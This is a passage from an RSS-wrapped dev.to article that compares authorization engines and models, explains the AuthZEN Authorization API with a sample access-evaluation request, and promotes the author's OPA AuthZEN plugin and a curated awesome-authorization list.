&lt;th&gt;Candidates&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Simple role management&lt;/td&gt;
&lt;td&gt;RBAC&lt;/td&gt;
&lt;td&gt;Casbin, Spring Security, Kubernetes RBAC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Complex branching logic (Attributes)&lt;/td&gt;
&lt;td&gt;ABAC&lt;/td&gt;
&lt;td&gt;OPA, Cedar, Cerbos&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Google Drive-style sharing / Hierarchies&lt;/td&gt;
&lt;td&gt;ReBAC&lt;/td&gt;
&lt;td&gt;SpiceDB, OpenFGA, Permify&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kubernetes policy control&lt;/td&gt;
&lt;td&gt;ABAC/RBAC&lt;/td&gt;
&lt;td&gt;OPA Gatekeeper, Kyverno&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;In reality, you often end up with a hybrid of RBAC + ABAC or a combination of ReBAC + ABAC. Cedar natively supports both RBAC and ABAC, while Aserto's Topaz combines Zanzibar-style ReBAC with an OPA engine for ABAC.&lt;/p&gt;




&lt;h2&gt;
  
  
  4. AuthZEN: Standardizing the AuthZ API
&lt;/h2&gt;

&lt;p&gt;All the authorization engines we’ve looked at share a glaring problem: &lt;strong&gt;Their APIs are completely fragmented.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;OPA wants &lt;code&gt;{"input": {...}}&lt;/code&gt; sent via &lt;code&gt;POST /v1/data/...&lt;/code&gt;. Cedar uses a different API entirely. SpiceDB expects a gRPC &lt;code&gt;CheckPermission&lt;/code&gt; call. They are all different.&lt;/p&gt;

&lt;p&gt;This means if you ever decide to swap engines, you have to rewrite all of your application code. We successfully separated PDP (decision) from PEP (enforcement), but we never standardized the protocol between them.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk2v9117oytfvcnlaswhe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk2v9117oytfvcnlaswhe.png" alt="AuthZEN" width="800" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In January 2026, the OpenID Foundation officially approved the &lt;strong&gt;AuthZEN Authorization API 1.0&lt;/strong&gt; as a Final Specification. It standardizes the communication between the PEP and PDP, allowing you to use the exact same JSON API regardless of which underlying engine is running.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Request:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Can&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;this&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;subject&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;perform&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;this&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;action&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;this&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;resource?&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;POST&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;/access/v&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="err"&gt;/evaluation&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"subject"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"user"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"alice"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"read"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"resource"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"document"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"doc-123"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Response&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"decision"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Why does this matter? It decouples your engine choice from your application code. Starting with OPA and later swapping it out for Cedar as your use case evolves is suddenly a realistic option.&lt;/p&gt;

&lt;h3&gt;
  
  
  Making OPA AuthZEN-Compatible
&lt;/h3&gt;

&lt;p&gt;I built a plugin that makes OPA natively speak AuthZEN.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/kanywst/opa-authzen-plugin" rel="noopener noreferrer"&gt;opa-authzen-plugin&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;OPA is a generic policy engine with its own REST API. Its paths, request structures, and response structures are entirely different from AuthZEN's. There was an &lt;code&gt;authzen-proxy&lt;/code&gt; built in Node.js sitting in the contrib repo, but running a separate proxy process alongside OPA felt less than ideal for production.&lt;/p&gt;

&lt;p&gt;So, I used OPA’s plugin architecture to run an AuthZEN server directly inside the OPA process itself. It’s the exact same pattern used by the &lt;code&gt;opa-envoy-plugin&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figfolhndl5567939rbj0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figfolhndl5567939rbj0.png" alt="opa-authzen-plugin" width="800" height="166"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Engines like Cerbos and Topaz have already started natively supporting AuthZEN. As more engines adopt it, the switching costs between them will continue to drop.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Why the Existing awesome-authorization Failed
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/warrant-dev/awesome-authorization" rel="noopener noreferrer"&gt;warrant-dev/awesome-authorization&lt;/a&gt; has around 420 stars and decent visibility. But looking closely at the content, there are obvious gaps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It focuses heavily on articles and concepts, lacking actual tools.&lt;/strong&gt; OPA gets exactly one line. Major engines like Cedar, OpenFGA, SpiceDB, Casbin, and Cerbos are entirely absent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It completely ignores modern standards.&lt;/strong&gt; The authorization spec world doesn’t end with OAuth 2.0. We have AuthZEN, SPIFFE, UMA, and GNAP reshaping the space, but none of them are covered.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It feels like a vendor proxy.&lt;/strong&gt; The repo puts the Warrant company banner right at the very top. It’s hard to call it a vendor-neutral community resource.&lt;/p&gt;

&lt;p&gt;So, I decided to build a better one.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Curating awesome-authorization
&lt;/h2&gt;

&lt;p&gt;I designed &lt;a href="https://github.com/kanywst/awesome-authorization" rel="noopener noreferrer"&gt;kanywst/awesome-authorization&lt;/a&gt; to cover the entire authorization landscape through the following sections:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi9es7j4hn1tywyha851i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi9es7j4hn1tywyha851i.png" alt="awesome-authorization" width="800" height="85"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The biggest differentiator from the old list is the &lt;strong&gt;Policy Engines section&lt;/strong&gt;. I explicitly categorized them into General Purpose, Zanzibar-based, Kubernetes Native, and AuthZEN-compatible. I wanted to create a place where anyone looking for an auth engine could instantly understand the entire current market.&lt;/p&gt;

&lt;p&gt;The Standards section is just as comprehensive, covering AuthZEN, OAuth/OIDC, SPIFFE/SPIRE, XACML, and GNAP. You can't grasp the "big picture" of authorization by just looking at tools—you need to understand the underlying specifications driving them.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;There are too many authorization engines, and no place to make sense of them all. So I fixed that.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/kanywst/awesome-authorization" rel="noopener noreferrer"&gt;kanywst/awesome-authorization&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Whether you are trying to select a policy engine, research a standard specification, or find that one specific engineering blog post you read months ago, treat this repository as your starting point.&lt;/p&gt;

&lt;p&gt;PRs are absolutely welcome. If a good tool or article is missing, please add it.&lt;/p&gt;




&lt;h2&gt;
  
  
  Related Articles
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kanywst/authzen-authorization-api-10-deep-dive-the-standard-api-that-separates-authorization-decisions-1m2a"&gt;AuthZEN Authorization API 1.0 Deep Dive&lt;/a&gt; : Deep Dive into the AuthZEN Spec&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kanywst/i-built-an-opa-plugin-that-turns-it-into-an-authzen-compatible-pdp-eac"&gt;I Built an OPA Plugin That Turns It Into an AuthZEN-Compatible PDP&lt;/a&gt; : Design and Implementation of opa-authzen-plugin&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kanywst/google-zanzibar-deep-dive-handling-2-trillion-acls-in-under-10ms-456d"&gt;Google Zanzibar Deep Dive&lt;/a&gt; : Explaining the Zanzibar Paper&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kanywst/rbac-vs-abac-vs-rebac-how-to-choose-and-implement-access-control-models-3c89"&gt;RBAC vs ABAC vs ReBAC&lt;/a&gt; : Comparing Access Control Models&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>authorization</category>
      <category>security</category>
      <category>opensource</category>
      <category>showdev</category>
    </item>
  </channel>
</rss>
